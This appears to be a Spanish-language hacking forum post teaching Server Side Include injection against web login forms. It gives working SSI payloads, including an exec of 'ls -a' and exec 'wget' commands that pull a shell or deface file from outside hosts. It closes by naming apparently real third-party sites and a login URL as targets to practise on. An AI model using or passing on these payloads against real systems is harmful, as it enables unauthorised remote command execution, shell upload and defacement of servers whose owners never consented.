(http://www4.picturepush.com/photo/a/5848522/img/5848522.gif)
(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .
Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget http://alpavista.net/AC_RunActiveContent.js "->
(http://i.imgur.com/mcZQV.png)
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
este comando nos permite ver los directorios
(http://1.bp.blogspot.com/-ZkNo6o-EtRg/T-RV5cmWY8I/AAAAAAAAAr8/f7dWEbzzk6k/s320/0.png)
http://www.fogstock.com/bin/Cklb
con este comando nos permitirá enviar nuestra shell o exploit deface etc.
<!--#exec cmd="wget http://website.com/abc.txt" -->
http://www.fogstock.com/AC_RunActiveContent.js
https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
http://musiclicensingstore.com/bin/Login?username= WEB PARA QUE PRACTIQUEN =D